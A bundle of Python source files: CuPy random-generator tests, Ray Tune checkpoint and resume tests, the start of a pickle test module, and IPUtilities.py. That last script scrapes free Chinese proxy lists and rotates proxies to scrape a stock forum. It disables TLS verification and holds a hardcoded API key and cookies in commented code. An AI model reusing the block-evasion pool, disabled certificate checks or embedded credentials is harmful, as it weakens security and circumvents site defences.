class TestStandardNormalInvalid(InvalidOutsMixin, GeneratorTestCase):
target_method = 'standard_normal'
def test_invalid_dtypes(self):
for dtype in 'bhiqleFD':
with pytest.raises(TypeError):
self.generate(size=(3, 2), dtype=dtype)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestIntegers(GeneratorTestCase):
target_method = 'integers'
def test_integers_1(self):
self.generate(3)
def test_integers_2(self):
self.generate(3, 4, size=(3, 2))
def test_integers_empty1(self):
self.generate(3, 10, size=0)
def test_integers_empty2(self):
self.generate(3, size=(4, 0, 5))
def test_integers_overflow(self):
self.generate(numpy.int8(-100), numpy.int8(100))
def test_integers_float1(self):
self.generate(-1.2, 3.4, 5)
def test_integers_float2(self):
self.generate(6.7, size=(2, 3))
def test_integers_int64_1(self):
self.generate(2**34, 2**40, 3)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks(self):
self.check_ks(0.05)(
low=100, high=1000, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_low(self):
self.check_ks(0.05)(
low=100, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_large(self):
self.check_ks(0.05)(
low=2**34, high=2**40, size=2000)
@_condition.repeat_with_success_at_least(10, 3)
def test_integers_ks_large2(self):
self.check_ks(0.05)(
2**40, size=2000)
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@testing.fix_random()
class TestRandom(InvalidOutsMixin, GeneratorTestCase):
# TODO(niboshi):
# Test soundness of distribution.
# Currently only reprocibility is checked.
target_method = 'random'
def test_random(self):
self.generate(3)
@testing.for_dtypes('fd')
@_condition.repeat_with_success_at_least(10, 3)
def test_random_ks(self, dtype):
self.check_ks(0.05)(size=2000, dtype=dtype)
@testing.parameterize(*common_distributions.geometric_params)
@testing.with_requires('numpy>=1.17.0')
@testing.fix_random()
class TestGeometric(
common_distributions.Geometric,
GeneratorTestCase
):
pass
@testing.with_requires('numpy>=1.17.0')
@testing.gpu
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestRandomStateThreadSafe(unittest.TestCase):
def test_default_rng_thread_safe(self):
def _f(func, args=()):
cupy.cuda.Device().use()
func(*args)
seed = 10
threads = [
threading.Thread(
target=_f, args=(cupy.random.default_rng, (seed,))),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
threading.Thread(target=_f, args=(cupy.random.default_rng)),
]
for t in threads:
t.start()
for t in threads:
t.join()
actual = cupy.random.default_rng(seed).standard_exponential()
expected = cupy.random.default_rng(seed).standard_exponential()
assert actual == expected
|
IPUtilities.py
|
# !/usr/bin/python3.6
# -*- coding: UTF-8 -*-
# @author: guichuan
import requests
import os
from scrapy.selector import Selector
import pandas as pd
import numpy as np
import datetime
import random
import multiprocessing as mp
import time
import warnings
def crawl_xici_ip(item_count, fileName='xici_iplist.par'):
"""
爬取西刺item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_xici_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.xicidaili.com/nn/{0}'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//*[@id="ip_list"]//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[2]/text()').extract_first()
port = tr.xpath('td[3]/text()').extract_first()
ip_type = tr.xpath('td[6]/text()').extract_first().lower()
ip_speed = tr.xpath('td[7]/div/@title').extract_first()
if ip_speed:
ip_speed = float(ip_speed.split(u'秒')[0])
ip_time = tr.xpath('td[10]/text()').extract_first()
ip_time = str(datetime.datetime.strptime('20' + ip_time, '%Y-%m-%d %H:%M'))
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of xici.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_89_ip(item_count, fileName='89_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_89_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.89ip.cn/index_{}.html'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="layui-table"]//tbody//tr')
for tr in all_trs[0:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[5]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y/%m/%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of 89ip.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_kuaidaili_ip(item_count, fileName='kuaidaili_iplist.par'):
"""
爬取kuaidaili网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_kuaidaili_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='https://www.kuaidaili.com/free/inha/{}/'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y-%m-%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of kuaidaili.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_xiladaili_ip(item_count, fileName='xiladaili_iplist.par'):
"""
爬取xiladaili网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_xiladaili_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='https://www.kuaidaili.com/free/inha/{}/'.format(page_count + 1), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs[1:]:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = 'http'
ip_speed = np.nan
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y-%m-%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of xiladaili.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_ip3366_ip(item_count, fileName='ip3366_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_ip3366_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
page_count = 0
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.ip3366.net/free/?stype=1&page={}'.format(page_count + 1),
headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//table[@class="table table-bordered table-striped"]//tbody//tr')
for tr in all_trs:
ip = tr.xpath('td[1]/text()').extract_first().strip()
port = tr.xpath('td[2]/text()').extract_first().strip()
ip_type = tr.xpath('td[4]/text()').extract_first().strip().lower()
ip_speed = tr.xpath('td[6]/text()').extract_first().strip()
ip_time = tr.xpath('td[7]/text()').extract_first().strip()
ip_time = datetime.datetime.strptime(ip_time, '%Y/%m/%d %H:%M:%S')
count += 1
ip_this = '{0}://{1}:{2}'.format(ip_type, ip, port)
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of ip3366.'.format(ip_type, ip, port, count))
ip_list.append((ip, port, ip_type, ip_speed, ip_time))
if count >= item_count:
break
else:
if len(all_trs) == 0:
break
else:
page_count += 1
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
def crawl_66ip_ip(item_count, fileName='66ip_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_66ip_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
count = 1
ip_list = []
while count <= item_count:
response = requests.get(url='http://www.66ip.cn/nmtq.php?getnum=300&isp=0&anonymoustype=3'
'&start=&ports=&export=&ipaddress=&area=1&proxytype=0&api=66ip', headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('/html/body//text()').extract()
for item in all_trs:
count += 1
ip_this = item.strip()
try:
ip, port = ip_this.split(':')
except ValueError:
print(ip_this)
continue
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of 66ip.'.format('http', ip, port, count))
ip_list.append((ip, port, 'http', np.nan, np.nan))
if count >= item_count:
break
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
# def crawl_ihuan_ip(item_count, fileName='ihuan_iplist.par'):
# """
# 爬取89ip网站item_count个数量的ip,存为parquet格式
# :return:
# """
# print("\nCrawling_ihun_ip...")
# path = os.path.join(os.path.abspath(os.curdir))
# file_name = os.path.join(path, fileName)
#
# headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0",
# "Content-Type": "application/x-www-form-urlencoded",
# "Upgrade-Insecure-Requests": "1",
# "Host": "ip.ihuan.me",
# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
# "Accept-Language": "en-US,en;q=0.5",
# "Accept-Encoding": "gzip,deflate",
# "Referer": "https://ip.ihuan.me/ti.html",
# "Pragma": "no-cache",
# "Cache-Control": "no-cache"
# }
# data = {"anonymity": "2",
# "num": "3000",
# "sort": "1",
# "type": "0",
# "key": "f8abe06f9dcb96776b8c16d9eb5cc0a2"
# }
#
# cookie_dict = {
# "__cfduid": "d24ab976aab68fc34226818a648cafc611591800745",
# "Hm_lpvt_8ccd0ef22095c2eebfe4cd6187dea829": "1592974423",
# "Hm_lvt_8ccd0ef22095c2eebfe4cd6187dea829": "1591800750, 1592968177",
# "statistics": "8689a6d889b430723559d3e9ae450e00"}
# count = 1
# ip_list = []
# while count <= item_count:
# response = requests.post(url='https://ip.ihuan.me/tqdl.html', headers=headers, data=data, cookies=cookie_dict)
# time.sleep(0.05)
# all_trs = Selector(text=response.text).xpath('/html/body//text()').extract()
#
# for item in all_trs:
# count += 1
# ip_this = item.strip()
# ip, port = ip_this.split(':')
# status, _ = IPUtil.judge_ip(ip_this, verbose=False)
# if status:
# print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item'.format('http', ip, port, count))
# ip_list.append((ip, port, 'http', np.nan, np.nan))
#
# if count >= item_count:
# break
#
# df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
# df.to_parquet(file_name)
def crawl_ihuan_ip(item_count, fileName='ihuan_iplist.par'):
"""
爬取89ip网站item_count个数量的ip,存为parquet格式
:return:
"""
print("Crawling_ihun_ip...")
path = os.path.join(os.path.abspath(os.curdir))
file_name = os.path.join(path, fileName)
headers = {"User-Agent": "Mozilla/5.0(X11;Linux x86_64;rv:60.0) Gecko/20100101Firefox/60.0"}
today = datetime.datetime.today()
today = datetime.datetime(today.year, today.month, today.day, today.hour)
count = 1
ip_list = []
finish_flag = False
while finish_flag is not True:
response = requests.post(url='https://ip.ihuan.me/today/{}/{:02d}/{:02d}/{:02d}.html'.
format(today.year, today.month, today.day, today.hour), headers=headers)
time.sleep(0.05)
all_trs = Selector(text=response.text).xpath('//p[@class="text-left"]//text()').extract()
for item in all_trs:
item = item.strip()
if item.split('@')[-1].split('#')[0] == 'HTTP' and item.split('@')[-1].split('#')[1][1:3] == "高匿":
count += 1
try:
ip_this = item.split('@')[0]
ip, port = ip_this.split(':')
except ValueError:
continue
status, _ = IPUtil.judge_ip(ip_this, verbose=False)
if status:
print('>>>>> Get proxy : {0}://{1}:{2}, from {3}th item of ihuan.'.format('http', ip, port, count))
ip_list.append((ip, port, 'http', np.nan, np.nan))
if count >= item_count:
finish_flag = True
break
else:
continue
today = today - datetime.timedelta(hours=1)
df = pd.DataFrame(ip_list, columns=['ip', 'port', 'type', 'speed', 'aliveTime'])
df.to_parquet(file_name)
class IPUtil(object):
# noinspection SqlDialectInspection
def __init__(self, sources: tuple = ('xici', '89ip', 'kuaidaili', 'xiladaili', '66ip', 'ip3366', 'ihuan')):
source_dict = {'xici': 'xici_iplist.par',
'89ip': '89_iplist.par',
'kuaidaili': 'kuaidaili_iplist.par',
'xiladaili': 'xiladaili_iplist.par',
'66ip': '66ip_iplist.par',
'ip3366': 'ip3366_iplist.par',
'ihuan': 'ihuan_iplist.par'
}
path = os.path.split(os.path.realpath(__file__))[0]
df_list = []
for source in sources:
try:
df_list.append(pd.read_parquet(os.path.join(path, source_dict[source])))
except Exception as err:
print('source %s is missing!' % err)
continue
df = pd.concat(df_list)
IP_POOL = list(zip(df['ip'].astype(str).tolist(),
df['port'].astype(str).tolist(),
df['type'].astype(str).tolist()))
ip_all = list(set(["{0}://{1}:{2}".format(ip_type, ip, port) for ip, port, ip_type in IP_POOL
if ip_type.lower() == 'http']))
pool = mp.Pool(processes=8)
connect_test_list_obj = [pool.apply_async(IPUtil.judge_ip, [item, 5]) for item in ip_all]
pool.close()
pool.join()
ip_all_checked = []
for item in connect_test_list_obj:
status, ip_result = item.get()
if status:
ip_all_checked.append(ip_result)
self.IP_POOL = ip_all_checked
print("\n>>>>> Get proxy IP list with length {}".format(len(self.IP_POOL)))
def random(self, check=False):
ip_random = random.choice(self.IP_POOL)
if check:
judge_re = IPUtil.judge_ip(ip_random, timeout=5)
if judge_re:
return ip_random
else:
return self.random()
else:
return ip_random
def remove(self, ip):
self.IP_POOL.remove(ip)
@staticmethod
def judge_ip(proxy_url, timeout=10, verbose=False):
warnings.filterwarnings('ignore')
# 判断ip是否可用,如果通过代理ip访问百度,返回code200则说明可用
http_url = "http://guba.eastmoney.com/news,600519,937492931_1.html"
try:
proxy_dict = {
"http": proxy_url,
}
requests.adapters.DEFAULT_RETRIES = 5
response = requests.get(http_url, proxies=proxy_dict, headers={'Connection': 'close'}, verify=False,
timeout=timeout)
test_string = Selector(text=response.text).xpath(
'/html/body/div[5]/div[3]/div[5]/div[1]/div[3]/div[1]/strong/a/font/text()').extract_first()
except Exception as err:
# print('>>>>> Check proxy : {}, Err: {}'.format(proxy_url, err))
return False, proxy_url
else:
code = response.status_code
if 200 <= code < 300 and test_string == 'Wan2':
if verbose:
print('>>>>> Check proxy : {}, return code: {}'.format(proxy_url, code))
return True, proxy_url
else:
return False, proxy_url
if __name__ == '__main__':
IPU = IPUtil()
print(IPU.random())
# func_pool = [crawl_xici_ip, crawl_89_ip, crawl_kuaidaili_ip, crawl_xiladaili_ip, crawl_ip3366_ip, crawl_66ip_ip, crawl_ihuan_ip]
# para = [1000, 750, 1000, 100, 1000, 300, 2000]
# iter_items = zip(func_pool, para)
#
# for func, item_count in iter_items:
# p = Process(target=func, args=(item_count,))
# p.start()
|
test_tune_restore.py
|
# coding: utf-8
import signal
from collections import Counter
import multiprocessing
import os
import shutil
import tempfile
import threading
import time
from typing import List
import unittest
import ray
from ray import tune
from ray._private.test_utils import recursive_fnmatch
from ray.rllib import _register_all
from ray.tune.callback import Callback
from ray.tune.suggest.basic_variant import BasicVariantGenerator
from ray.tune.suggest import Searcher
from ray.tune.trial import Trial
from ray.tune.utils import validate_save_restore
from ray.tune.utils.mock_trainable import MyTrainableClass
class TuneRestoreTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=1, num_gpus=0, local_mode=True)
tmpdir = tempfile.mkdtemp()
test_name = "TuneRestoreTest"
tune.run(
"PG",
name=test_name,
stop={"training_iteration": 1},
checkpoint_freq=1,
local_dir=tmpdir,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
logdir = os.path.expanduser(os.path.join(tmpdir, test_name))
self.logdir = logdir
self.checkpoint_path = recursive_fnmatch(logdir, "checkpoint-1")[0]
def tearDown(self):
shutil.rmtree(self.logdir)
ray.shutdown()
_register_all()
def testTuneRestore(self):
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2}, # train one more iteration.
checkpoint_freq=1,
restore=self.checkpoint_path, # Restore the checkpoint
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
def testPostRestoreCheckpointExistence(self):
"""Tests that checkpoint restored from is not deleted post-restore."""
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2},
checkpoint_freq=1,
keep_checkpoints_num=1,
restore=self.checkpoint_path,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
self.assertTrue(os.path.isfile(self.checkpoint_path))
# Defining the callbacks at the file level, so they can be pickled and spawned
# in a separate process.
class SteppingCallback(Callback):
def __init__(self, driver_semaphore, trainer_semaphore):
self.driver_semaphore = driver_semaphore
self.trainer_semaphore = trainer_semaphore
def on_step_end(self, iteration, trials, **info):
self.driver_semaphore.release() # Driver should continue
self.trainer_semaphore.acquire() # Wait until released
def _run(local_dir, driver_semaphore, trainer_semaphore):
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
local_dir=local_dir,
name="interrupt",
callbacks=[SteppingCallback(driver_semaphore, trainer_semaphore)],
)
class TuneInterruptionTest(unittest.TestCase):
def testExperimentInterrupted(self):
local_dir = tempfile.mkdtemp()
# Unix platforms may default to "fork", which is problematic with
# multithreading and GRPC. The child process should always be spawned.
mp_ctx = multiprocessing.get_context("spawn")
driver_semaphore = mp_ctx.Semaphore()
trainer_semaphore = mp_ctx.Semaphore()
process = mp_ctx.Process(
target=_run,
args=(local_dir, driver_semaphore, trainer_semaphore),
name="tune_interrupt",
)
process.daemon = False
process.start()
exp_dir = os.path.join(local_dir, "interrupt")
# Skip first five steps
for i in range(5):
driver_semaphore.acquire() # Wait for callback
trainer_semaphore.release() # Continue training
driver_semaphore.acquire()
experiment_state_file = None
for file in os.listdir(exp_dir):
if file.startswith("experiment_state"):
experiment_state_file = os.path.join(exp_dir, file)
break
self.assertTrue(experiment_state_file)
last_mtime = os.path.getmtime(experiment_state_file)
# Now send kill signal
os.kill(process.pid, signal.SIGINT)
# Release trainer. It should handle the signal and try to
# checkpoint the experiment
trainer_semaphore.release()
time.sleep(2) # Wait for checkpoint
new_mtime = os.path.getmtime(experiment_state_file)
self.assertNotEqual(last_mtime, new_mtime)
shutil.rmtree(local_dir)
def testInterruptDisabledInWorkerThread(self):
# https://github.com/ray-project/ray/issues/22295
# This test will hang without the proper patch because tune.run will fail.
event = threading.Event()
def run_in_thread():
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
)
event.set()
thread = threading.Thread(target=run_in_thread)
thread.start()
event.wait()
thread.join()
ray.shutdown()
del os.environ["TUNE_DISABLE_SIGINT_HANDLER"]
class TuneFailResumeGridTest(unittest.TestCase):
class FailureInjectorCallback(Callback):
"""Adds random failure injection to the TrialExecutor."""
def __init__(self, num_trials=20):
self.num_trials = num_trials
def on_step_end(self, trials, **kwargs):
if len(trials) == self.num_trials:
print(f"Failing after {self.num_trials} trials.")
raise RuntimeError
class CheckStateCallback(Callback):
"""Checks state for the experiment initialization."""
def __init__(self, expected_trials=20):
self.expected_trials = expected_trials
self._checked = False
def on_step_begin(self, iteration, trials, **kwargs):
if not self._checked:
assert len(trials) == self.expected_trials
self._checked = True
class CheckTrialResourcesCallback(Callback):
"""Checks if pending trials are requesting the right amount of
resources.
The check happens exactly once after `check_after` number of calls
to on_step_begin(). Note, we deliberately delay the check to after
`check_after` number of steps. This is because when we start a
tuning job from fresh (rather than restored), trial list is still
empty - any check now would be trivial and thus wasted.
"""
def __init__(self, expected_cpu: int, check_after: int = 1):
self._expected_cpu = expected_cpu
self._checked = False
self._check_after = check_after
def on_step_begin(self, iteration: int, trials: List["Trial"], **info):
if not self._checked and iteration >= self._check_after:
for trial in trials:
if trial.status == Trial.PENDING:
assert (
trial.placement_group_factory.required_resources.get(
"CPU", 0
)
== self._expected_cpu
)
self._checked = True
def setUp(self):
self.logdir = tempfile.mkdtemp()
os.environ["TUNE_GLOBAL_CHECKPOINT_S"] = "0"
# Change back to local_mode=True after this is resolved:
# https://github.com/ray-project/ray/issues/13932
ray.init(local_mode=False, num_cpus=2)
from ray.tune import register_trainable
register_trainable("trainable", MyTrainableClass)
def tearDown(self):
os.environ.pop("TUNE_GLOBAL_CHECKPOINT_S")
shutil.rmtree(self.logdir)
ray.shutdown()
def testFailResumeGridSearch(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run("trainable", callbacks=[self.FailureInjectorCallback()], **config)
analysis = tune.run(
"trainable", resume=True, callbacks=[self.CheckStateCallback()], **config
)
assert len(analysis.trials) == 27
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert all(v == 9 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert all(v == 9 for v in test2_counter.values())
# Unfinished trials' resources should be updated.
def testResourceUpdateInResume(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[
self.FailureInjectorCallback(),
self.CheckTrialResourcesCallback(1),
],
**config,
)
analysis = tune.run(
"trainable",
resume=True,
resources_per_trial={"cpu": 2},
callbacks=[self.CheckTrialResourcesCallback(2)],
**config,
)
assert len(analysis.trials) == 27
def testFailResumeWithPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(5)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=5)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testFailResumeAfterPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(15)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=15)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testMultiExperimentFail(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
experiments = []
for i in range(3):
experiments.append(
tune.Experiment(
run=MyTrainableClass,
name="trainable",
num_samples=2,
config={
"test": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 1},
local_dir=self.logdir,
)
)
with self.assertRaises(RuntimeError):
tune.run(
experiments,
callbacks=[self.FailureInjectorCallback(10)],
fail_fast=True,
)
analysis = tune.run(
experiments,
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=10)],
fail_fast=True,
)
assert len(analysis.trials) == 18
def testWarningLargeGrid(self):
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search(list(range(20))),
"test2": tune.grid_search(list(range(20))),
"test3": tune.grid_search(list(range(20))),
"test4": tune.grid_search(list(range(20))),
"test5": tune.grid_search(list(range(20))),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertWarnsRegex(UserWarning, "exceeds the serialization threshold"):
with self.assertRaises(RuntimeError):
tune.run(
"trainable", callbacks=[self.FailureInjectorCallback(10)], **config
)
class TuneExampleTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=2)
def tearDown(self):
ray.shutdown()
_register_all()
def testPBTKeras(self):
from ray.tune.examples.pbt_tune_cifar10_with_keras import Cifar10Model
from tensorflow.python.keras.datasets import cifar10
cifar10.load_data()
validate_save_restore(Cifar10Model)
validate_save_restore(Cifar10Model, use_object_store=True)
def testPyTorchMNIST(self):
from ray.tune.examples.mnist_pytorch_trainable import TrainMNIST
from torchvision import datasets
datasets.MNIST("~/data", train=True, download=True)
validate_save_restore(TrainMNIST)
validate_save_restore(TrainMNIST, use_object_store=True)
def testHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
def testAsyncHyperbandExample(self):
validate_save_restore(MyTrainableClass)
validate_save_restore(MyTrainableClass, use_object_store=True)
class AutoInitTest(unittest.TestCase):
def testTuneRestore(self):
self.assertFalse(ray.is_initialized())
tune.run("__fake", name="TestAutoInit", stop={"training_iteration": 1})
self.assertTrue(ray.is_initialized())
def tearDown(self):
ray.shutdown()
_register_all()
class SearcherTest(unittest.TestCase):
class MockSearcher(Searcher):
def __init__(self, data):
self.data = data
def save(self, path):
with open(path, "w") as f:
f.write(self.data)
def restore(self, path):
with open(path, "r") as f:
self.data = f.read()
def testSaveRestoreDir(self):
tmpdir = tempfile.mkdtemp()
original_data = "hello-its-me"
searcher = self.MockSearcher(original_data)
searcher.save_to_dir(tmpdir)
searcher_2 = self.MockSearcher("no-its-not-me")
searcher_2.restore_from_dir(tmpdir)
assert searcher_2.data == original_data
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__] + sys.argv[1:]))
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
